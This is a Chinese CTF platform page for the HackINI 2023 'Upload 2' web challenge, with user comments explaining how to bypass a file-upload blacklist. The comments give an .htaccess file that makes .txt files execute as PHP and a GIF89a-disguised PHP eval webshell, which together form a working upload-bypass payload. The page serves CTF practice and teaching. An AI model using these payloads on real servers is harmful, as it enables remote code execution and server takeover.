Upload 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 409
提  示:
描  述:
We used a blacklist now ... can you **access** the flag now?\n\n\n\ \ **Author**: souad
评论
JJhello 2年前

上传一个文件名为 ".htaccess",注意,文件名前面没有任何东西的,文件内容为: #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 然后上传shell.txt,内容为

回复 1

samRsa 2年前

1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>

回复 0

PandaCattle 2年前

看了官方wp就知道有多离谱。。https://github.com/Shellmates/HackINI-2k23-public/blob/main/web/upload-2/solve/README.md

回复 0

hopeinhand 2年前

后缀php不行,换后缀php5发现容器只允许.php后缀执行命令,使用.htaccess绕过

回复 0
zuoyantiao115 1年前

@PandaCattle #define width 16 #define height 7在这里起到的作用是什么?

回复 0

PandaCattle 2年前

@jiangbw 做出来了,只能说逆天,.htaccess内容里面必须有#define width 16 #define height 7

回复 0

PandaCattle 2年前

@jiangbw 我也一样 直接报错了 是不是环境有问题

回复 0

jiangbw 2年前

@niano.0 .htaccess上传完就跳界面了,那怎么绕过啊

回复 0

niano.0 2年前

@xjc7580 大佬,怎么做的呀

回复 0

xjc7580 2年前

大佬,再给点提示呗,上传.htaccess与上传的shell不一个目录啊

回复 1

WriteUp

image
lolthis223

1 金币

评分(2)

解题动态

13615049106 攻破了该题 7小时前
houst 攻破了该题 2天前
win11 攻破了该题 10天前
Exo_king 攻破了该题 10天前
ha1 攻破了该题 10天前
qiu111 攻破了该题 11天前
TXX2025 攻破了该题 11天前
江海不渡你 攻破了该题 12天前
阜阳朴昌范 攻破了该题 13天前
寒醨 攻破了该题 13天前
hkyj 攻破了该题 14天前
声声慢 攻破了该题 14天前
drdr123456 攻破了该题 14天前
houguan 攻破了该题 15天前
Q@vqi 攻破了该题 17天前
fljx7180 攻破了该题 17天前
pudding2024 攻破了该题 19天前
tianxiang2242 攻破了该题 20天前
Yuelan 攻破了该题 21天前
zhaipu 攻破了该题 24天前
问题反馈